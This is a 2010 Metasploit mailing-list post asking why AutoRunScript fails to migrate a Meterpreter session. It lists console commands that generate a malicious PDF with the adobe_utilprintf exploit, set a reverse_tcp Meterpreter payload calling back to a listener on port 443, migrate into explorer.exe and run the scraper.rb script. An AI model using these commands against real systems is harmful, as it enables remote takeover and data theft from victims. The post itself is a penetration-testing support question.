Metasploit mailing list archives

AutoRunScript trouble


From: Glenn Wilkinson <glenn.wilkinson () gmail com>
Date: Mon, 18 Oct 2010 12:57:43 +0200

Hello all,

I'm having a bit of trouble using AutoRunScript; I can't seem to get
any commands or script to autorun. Below is my setup:

#Create
use exploit/windows/fileformat/adobe_utilprintf
set FILENAME test.pdf
set OUTPUTPATH /tmp
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST xx.xx.xx.xx
set LPORT 443
set ExitOnSession FALSE
set AutoRunScript "migrate explorer.exe"
exploit -j

For the AutoRunScript option I've also tried the following:
set AutoRunScript "migrate explorer"
set AutoRunScript migrate explorer.exe
set AutoRunScript migrate explorer
set AutoRunScript "migrate 1981   (Known PID for the explorer.exe)

None of the above migrate the process. I've also tried using a script
(the scraper.rb script):

set AutoRunScript /tmp/scraper.rb

Again, no luck.

I suspect I'm doing something silly. Any help on getting this right
would be greatly appreciated!

Best,
Glenn

P.S Not sure if it helps, but here's my listener setup:

#catcher
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST xx.xx.xx.xx
set LPORT 443
exploit

Addtionally, my version number:

metasploit v3.5.0-dev [core:3.5 api:1.0]
 609 exploits - 304 auxiliary
 225 payloads - 27 encoders - 8 nops
 svn r10669 updated 5 days ago (2010.10.13)
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: